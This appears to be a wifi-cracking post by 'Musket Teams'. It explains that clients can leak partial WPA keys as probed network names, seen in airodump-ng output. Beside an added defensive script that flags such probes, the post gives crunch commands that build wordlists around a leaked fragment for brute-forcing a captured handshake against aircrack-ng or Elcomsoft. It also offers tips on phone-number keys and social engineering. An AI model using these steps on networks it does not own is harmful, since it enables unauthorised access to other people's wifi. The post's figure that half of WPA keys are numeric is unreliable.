WPA Key Fragments Broadcast In Clear Text


WPA keys in clear text have taken another turn. Our Musket Team C programmer has found cases where WPA key fragments (i.e. incomplete keys) are being broadcast in clear text. In these cases the wifi user has typed an incomplete WPA key into the ESSID field of the wifi software. When the key does not work the user creates another connection profile but does not remove the older one. The wifi device then sends probe requests for both the WPA key fragment and the real ESSID name.

These key fragments are easy to recognise if they are less than 8 characters in length, since a valid WPA passphrase must be at least 8 characters. Incomplete keys of 8 or more characters are harder to tell apart from genuine ESSIDs.

A rule of thumb in WPA brute force cracking is that 50% of the keys chosen by users are numeric strings 8 to 10 characters in length, and more than half of these numeric-only keys are local telephone numbers.

You might see something like this in the airodump-ng probes:

1234567, Wifi Home
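As an added example (not code from the original post or from the Musket Teams tools), the script below shows how an administrator auditing their own site could flag probe entries like the one above in an airodump-ng CSV export, so that users with a stale profile leaking a key fragment can be told to delete it. The station section layout, the sample capture lines and the fragment heuristic (short, lowercase alphanumeric, contains digits, no spaces) are all assumptions of this example; genuinely numeric SSIDs will produce false positives and should be reviewed by hand.

```python
import re
from typing import Dict, List

# Constructed sample in the layout of the "Station" section of an airodump-ng
# CSV export (assumed layout; these are not real capture lines).
SAMPLE_STATION_CSV = """\
Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:11:22:33, 2024-01-01 10:00:00, 2024-01-01 10:05:00, -40, 120, (not associated) , 1234567,Wifi Home
AA:BB:CC:44:55:66, 2024-01-01 10:01:00, 2024-01-01 10:04:00, -55, 12, (not associated) , CoffeeShop
AA:BB:CC:77:88:99, 2024-01-01 10:02:00, 2024-01-01 10:03:00, -70, 3, (not associated) , 5551234,Home Net,555123456
"""

# Heuristic from the post: a probed "ESSID" that is a short run of digits or
# lowercase alphanumerics, with no spaces, looks like a typed-in key fragment.
FRAGMENT_RE = re.compile(r"^[0-9a-z]{5,10}$")


def parse_probes(csv_text: str) -> Dict[str, List[str]]:
    """Map each station MAC to the list of ESSIDs it probed for.

    Assumes the probed ESSIDs are every comma-separated field after the
    sixth column (BSSID), which is how airodump-ng writes its station rows.
    """
    probes: Dict[str, List[str]] = {}
    for line in csv_text.splitlines():
        if not line.strip() or line.startswith("Station MAC"):
            continue
        fields = [f.strip() for f in line.split(",")]
        if len(fields) < 7:
            continue  # malformed or truncated row
        mac = fields[0]
        probes[mac] = [e for e in fields[6:] if e]
    return probes


def looks_like_fragment(essid: str) -> bool:
    """True if the probed name matches the key-fragment pattern."""
    return bool(FRAGMENT_RE.match(essid)) and any(c.isdigit() for c in essid)


def find_suspect_stations(csv_text: str) -> Dict[str, Dict[str, List[str]]]:
    """Return stations that probe for at least one fragment-looking name.

    Each entry lists the suspect fragments and the other, normal-looking
    ESSIDs the same station probed for, which is the pattern the post
    describes (fragment plus real network name from the same client).
    """
    report: Dict[str, Dict[str, List[str]]] = {}
    for mac, essids in parse_probes(csv_text).items():
        fragments = [e for e in essids if looks_like_fragment(e)]
        if fragments:
            report[mac] = {
                "fragments": fragments,
                "other": [e for e in essids if e not in fragments],
            }
    return report


if __name__ == "__main__":
    for mac, info in find_suspect_stations(SAMPLE_STATION_CSV).items():
        print(f"{mac}: possible key fragments {info['fragments']} "
              f"(also probes {info['other']})")
```

Run against the constructed sample this flags the first and third stations and ignores the CoffeeShop client; the fragments of 8 or more characters (such as 555123456) are reported as well, since the post notes those are the ones a human is least likely to spot by eye.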

Hence ESSID probes shorter than 8 characters in length that appear to be key fragments might be attacked as follows.

Most WPA keys are numeric only, 8 to 10 characters in length. If you have Elcomsoft and Windows, use the word attack and check combinations of the string. If not, make a series of dictionary files and test them against a captured handshake.


For example, if you see "1234567, Wifi Home" in your probes, run crunch.

A simple approach here would be:

crunch 8 8 "0123456789abcdefghijklmnopqrstuvwxyz" -t 1234567@ -o File88-01

crunch 9 9 "0123456789abcdefghijklmnopqrstuvwxyz" -t 1234567@@ -o File99-01

crunch 10 10 "0123456789abcdefghijklmnopqrstuvwxyz" -t 1234567@@@ -o File1010-01

crunch 8 8 "0123456789abcdefghijklmnopqrstuvwxyz" -t @1234567 -o File88-02

crunch 9 9 "0123456789abcdefghijklmnopqrstuvwxyz" -t @@1234567 -o File99-02

crunch 10 10 "0123456789abcdefghijklmnopqrstuvwxyz" -t @@@1234567 -o File1010-02


A more complicated approach would be to work through ALL the positions, making a small dictionary for each:


crunch 8 8 "0123456789abcdefghijklmnopqrstuvwxyz" -t 1@234567 -o File88c-01

crunch 8 8 "0123456789abcdefghijklmnopqrstuvwxyz" -t 12@34567 -o File88c-02

crunch 8 8 "0123456789abcdefghijklmnopqrstuvwxyz" -t 123@4567 -o File88c-03

crunch 8 8 "0123456789abcdefghijklmnopqrstuvwxyz" -t 1234@567 -o File88c-04

crunch 8 8 "0123456789abcdefghijklmnopqrstuvwxyz" -t 12345@67 -o File88c-05

crunch 8 8 "0123456789abcdefghijklmnopqrstuvwxyz" -t 123456@7 -o File88c-06


crunch 9 9 "0123456789abcdefghijklmnopqrstuvwxyz" -t 1@2345678 -o File99c-06

and so on.

Not all variations are shown here.


Probed strings 8 or more characters in length that do not crack the handshake when run as-is through tools like aircrack-ng might themselves be WPA key fragments. In such a case the more complicated approach must be employed.

There is a significant social engineering component in successfully brute forcing a WPA key. Even if your cracking speed is slow, running numeric keys 8 to 10 characters in length against a WPA handshake is feasible. If you are given part of the key, the chances of cracking the WPA key increase.

Mteams are working on an expansion of ESSIDPROBE1-5 to construct these dictionaries automatically. In the meantime, if you discover these WPA fragments in clear text you can try the simple approach above - you might just get lucky.

Musket Teams